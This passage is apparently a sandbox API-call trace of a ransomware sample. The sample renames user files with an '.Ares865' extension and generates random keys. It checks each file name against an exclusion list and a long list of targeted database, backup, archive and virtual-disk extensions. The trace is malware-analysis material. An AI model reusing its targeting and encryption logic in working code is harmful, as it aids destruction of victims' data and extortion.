returned -1 [0059.943] lstrlenW (lpString="tps") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0059.943] lstrlenW (lpString="trc") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.943] lstrlenW (lpString="trc") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.943] lstrlenW (lpString="trm") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0059.943] lstrlenW (lpString="udb") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0059.943] lstrlenW (lpString="udl") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0059.943] lstrlenW (lpString="usr") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0059.943] lstrlenW (lpString="v12") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0059.943] lstrlenW (lpString="vis") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0059.943] lstrlenW (lpString="vpd") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0059.943] lstrlenW (lpString="vvv") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0059.943] lstrlenW (lpString="wdb") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0059.943] lstrlenW (lpString="wmdb") returned 4 [0059.943] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0059.943] lstrlenW (lpString="wrk") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0059.943] lstrlenW (lpString="xdb") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0059.943] lstrlenW (lpString="xld") returned 3 [0059.943] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0059.944] lstrlenW (lpString="xmlff") returned 5 [0059.944] lstrcmpiW (lpString1="ns-ms", lpString2="xmlff") returned -1 [0059.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865") returned 94 [0059.944] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default user\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), lpNewFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0059.945] CreateFileW (lpFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0059.945] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15378) returned 1 [0059.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0059.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.945] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0059.945] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0059.946] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.946] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.946] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f20, lpName=0x0) returned 0x164 [0059.947] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f20) returned 0x190000 [0059.949] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0059.950] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.950] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.950] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.950] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.950] CloseHandle (hObject=0x164) returned 1 [0059.950] CloseHandle (hObject=0x15c) returned 1 [0059.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0059.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0059.952] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="aoldtz.exe") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".") returned 1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="..") returned 1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="windows") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="bootmgr") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="temp") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="pagefile.sys") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="boot") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="ids.txt") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="perflogs") returned -1 [0059.952] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="MSBuild") returned -1 [0059.952] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0059.953] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms") returned 86 [0059.953] lstrcpyW (in: lpString1=0x2cce460, lpString2="7e4dca80246863e3.customDestinations-ms" | out: lpString1="7e4dca80246863e3.customDestinations-ms") returned="7e4dca80246863e3.customDestinations-ms" [0059.953] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0059.953] lstrlenW (lpString="Ares865") returned 7 [0059.953] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0059.953] lstrlenW (lpString=".dll") returned 4 [0059.953] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".dll") returned 1 [0059.953] lstrlenW (lpString=".lnk") returned 4 [0059.953] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".lnk") returned 1 [0059.953] lstrlenW (lpString=".ini") returned 4 [0059.953] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".ini") returned 1 [0059.953] lstrlenW (lpString=".sys") returned 4 [0059.953] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".sys") returned 1 [0059.953] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0059.953] lstrlenW (lpString="bak") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0059.953] lstrlenW (lpString="ba_") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0059.953] lstrlenW (lpString="dbb") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0059.953] lstrlenW (lpString="vmdk") returned 4 [0059.953] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0059.953] lstrlenW (lpString="rar") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0059.953] lstrlenW (lpString="zip") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0059.953] lstrlenW (lpString="tgz") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0059.953] lstrlenW (lpString="vbox") returned 4 [0059.953] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0059.953] lstrlenW (lpString="vdi") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0059.953] lstrlenW (lpString="vhd") returned 3 [0059.953] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0059.953] lstrlenW (lpString="vhdx") returned 4 [0059.953] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0059.953] lstrlenW (lpString="avhd") returned 4 [0059.954] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0059.954] lstrlenW (lpString="db") returned 2 [0059.954] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0059.954] lstrlenW (lpString="db2") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0059.954] lstrlenW (lpString="db3") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0059.954] lstrlenW (lpString="dbf") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0059.954] lstrlenW (lpString="mdf") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0059.954] lstrlenW (lpString="mdb") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0059.954] lstrlenW (lpString="sql") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0059.954] lstrlenW (lpString="sqlite") returned 6 [0059.954] lstrcmpiW (lpString1="ons-ms", lpString2="sqlite") returned -1 [0059.954] lstrlenW (lpString="sqlite3") returned 7 [0059.954] lstrcmpiW (lpString1="ions-ms", lpString2="sqlite3") returned -1 [0059.954] lstrlenW (lpString="sqlitedb") returned 8 [0059.954] lstrcmpiW (lpString1="tions-ms", lpString2="sqlitedb") returned 1 [0059.954] lstrlenW (lpString="xml") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0059.954] lstrlenW (lpString="$er") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0059.954] lstrlenW (lpString="4dd") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0059.954] lstrlenW (lpString="4dl") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0059.954] lstrlenW (lpString="^^^") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0059.954] lstrlenW (lpString="abs") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0059.954] lstrlenW (lpString="abx") returned 3 [0059.954] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0059.954] lstrlenW (lpString="accdb") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0059.955] lstrlenW (lpString="accdc") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0059.955] lstrlenW (lpString="accde") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0059.955] lstrlenW (lpString="accdr") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0059.955] lstrlenW (lpString="accdt") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0059.955] lstrlenW (lpString="accdw") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0059.955] lstrlenW (lpString="accft") returned 5 [0059.955] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0059.955] lstrlenW (lpString="adb") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.955] lstrlenW (lpString="adb") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.955] lstrlenW (lpString="ade") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0059.955] lstrlenW (lpString="adf") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0059.955] lstrlenW (lpString="adn") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0059.955] lstrlenW (lpString="adp") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0059.955] lstrlenW (lpString="alf") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0059.955] lstrlenW (lpString="ask") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0059.955] lstrlenW (lpString="btr") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0059.955] lstrlenW (lpString="cat") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0059.955] lstrlenW (lpString="cdb") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0059.955] lstrlenW (lpString="ckp") returned 3 [0059.955] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0059.955] lstrlenW (lpString="cma") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0059.956] lstrlenW (lpString="cpd") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0059.956] lstrlenW (lpString="dacpac") returned 6 [0059.956] lstrcmpiW (lpString1="ons-ms", lpString2="dacpac") returned 1 [0059.956] lstrlenW (lpString="dad") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0059.956] lstrlenW (lpString="dadiagrams") returned 10 [0059.956] lstrcmpiW (lpString1="nations-ms", lpString2="dadiagrams") returned 1 [0059.956] lstrlenW (lpString="daschema") returned 8 [0059.956] lstrcmpiW (lpString1="tions-ms", lpString2="daschema") returned 1 [0059.956] lstrlenW (lpString="db-journal") returned 10 [0059.956] lstrcmpiW (lpString1="nations-ms", lpString2="db-journal") returned 1 [0059.956] lstrlenW (lpString="db-shm") returned 6 [0059.956] lstrcmpiW (lpString1="ons-ms", lpString2="db-shm") returned 1 [0059.956] lstrlenW (lpString="db-wal") returned 6 [0059.956] lstrcmpiW (lpString1="ons-ms", lpString2="db-wal") returned 1 [0059.956] lstrlenW (lpString="dbc") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0059.956] lstrlenW (lpString="dbs") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0059.956] lstrlenW (lpString="dbt") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0059.956] lstrlenW (lpString="dbv") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0059.956] lstrlenW (lpString="dbx") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0059.956] lstrlenW (lpString="dcb") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0059.956] lstrlenW (lpString="dct") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0059.956] lstrlenW (lpString="dcx") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0059.956] lstrlenW (lpString="ddl") returned 3 [0059.956] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0059.956] lstrlenW (lpString="dlis") returned 4 [0059.956] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0059.956] lstrlenW (lpString="dp1") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0059.957] lstrlenW (lpString="dqy") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0059.957] lstrlenW (lpString="dsk") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0059.957] lstrlenW (lpString="dsn") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0059.957] lstrlenW (lpString="dtsx") returned 4 [0059.957] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0059.957] lstrlenW (lpString="dxl") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0059.957] lstrlenW (lpString="eco") returned 3 [0059.957] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0059.957] lstrlenW (lpString="ecx") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0059.958] lstrlenW (lpString="edb") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0059.958] lstrlenW (lpString="epim") returned 4 [0059.958] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0059.958] lstrlenW (lpString="fcd") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0059.958] lstrlenW (lpString="fdb") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0059.958] lstrlenW (lpString="fic") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0059.958] lstrlenW (lpString="flexolibrary") returned 12 [0059.958] lstrcmpiW (lpString1="tinations-ms", lpString2="flexolibrary") returned 1 [0059.958] lstrlenW (lpString="fm5") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0059.958] lstrlenW (lpString="fmp") returned 3 [0059.958] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0059.958] lstrlenW (lpString="fmp12") returned 5 [0059.958] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0059.958] lstrlenW (lpString="fmpsl") returned 5 [0059.958] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0059.959] lstrlenW (lpString="fol") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0059.959] lstrlenW (lpString="fp3") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0059.959] lstrlenW (lpString="fp4") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0059.959] lstrlenW (lpString="fp5") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0059.959] lstrlenW (lpString="fp7") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0059.959] lstrlenW (lpString="fpt") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0059.959] lstrlenW (lpString="frm") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0059.959] lstrlenW (lpString="gdb") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.959] lstrlenW (lpString="gdb") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.959] lstrlenW (lpString="grdb") returned 4 [0059.959] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0059.959] lstrlenW (lpString="gwi") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0059.959] lstrlenW (lpString="hdb") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0059.959] lstrlenW (lpString="his") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0059.959] lstrlenW (lpString="ib") returned 2 [0059.959] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0059.959] lstrlenW (lpString="idb") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0059.959] lstrlenW (lpString="ihx") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0059.959] lstrlenW (lpString="itdb") returned 4 [0059.959] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0059.959] lstrlenW (lpString="itw") returned 3 [0059.959] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0059.959] lstrlenW (lpString="jet") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0059.960] lstrlenW (lpString="jtx") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0059.960] lstrlenW (lpString="kdb") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0059.960] lstrlenW (lpString="kexi") returned 4 [0059.960] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0059.960] lstrlenW (lpString="kexic") returned 5 [0059.960] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0059.960] lstrlenW (lpString="kexis") returned 5 [0059.960] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0059.960] lstrlenW (lpString="lgc") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0059.960] lstrlenW (lpString="lwx") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0059.960] lstrlenW (lpString="maf") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0059.960] lstrlenW (lpString="maq") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0059.960] lstrlenW (lpString="mar") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0059.960] lstrlenW (lpString="marshal") returned 7 [0059.960] lstrcmpiW (lpString1="ions-ms", lpString2="marshal") returned -1 [0059.960] lstrlenW (lpString="mas") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0059.960] lstrlenW (lpString="mav") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0059.960] lstrlenW (lpString="maw") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0059.960] lstrlenW (lpString="mdbhtml") returned 7 [0059.960] lstrcmpiW (lpString1="ions-ms", lpString2="mdbhtml") returned -1 [0059.960] lstrlenW (lpString="mdn") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0059.960] lstrlenW (lpString="mdt") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0059.960] lstrlenW (lpString="mfd") returned 3 [0059.960] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0059.961] lstrlenW (lpString="mpd") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0059.961] lstrlenW (lpString="mrg") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0059.961] lstrlenW (lpString="mud") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0059.961] lstrlenW (lpString="mwb") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0059.961] lstrlenW (lpString="myd") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0059.961] lstrlenW (lpString="ndf") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0059.961] lstrlenW (lpString="nnt") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0059.961] lstrlenW (lpString="nrmlib") returned 6 [0059.961] lstrcmpiW (lpString1="ons-ms", lpString2="nrmlib") returned 1 [0059.961] lstrlenW (lpString="ns2") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0059.961] lstrlenW (lpString="ns3") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0059.961] lstrlenW (lpString="ns4") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0059.961] lstrlenW (lpString="nsf") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0059.961] lstrlenW (lpString="nv") returned 2 [0059.961] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0059.961] lstrlenW (lpString="nv2") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0059.961] lstrlenW (lpString="nwdb") returned 4 [0059.961] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0059.961] lstrlenW (lpString="nyf") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0059.961] lstrlenW (lpString="odb") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.961] lstrlenW (lpString="odb") returned 3 [0059.961] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.961] lstrlenW (lpString="oqy") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0059.962] lstrlenW (lpString="ora") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0059.962] lstrlenW (lpString="orx") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0059.962] lstrlenW (lpString="owc") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0059.962] lstrlenW (lpString="p96") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0059.962] lstrlenW (lpString="p97") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0059.962] lstrlenW (lpString="pan") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0059.962] lstrlenW (lpString="pdb") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0059.962] lstrlenW (lpString="pdm") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0059.962] lstrlenW (lpString="pnz") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0059.962] lstrlenW (lpString="qry") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0059.962] lstrlenW (lpString="qvd") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0059.962] lstrlenW (lpString="rbf") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="rbf") 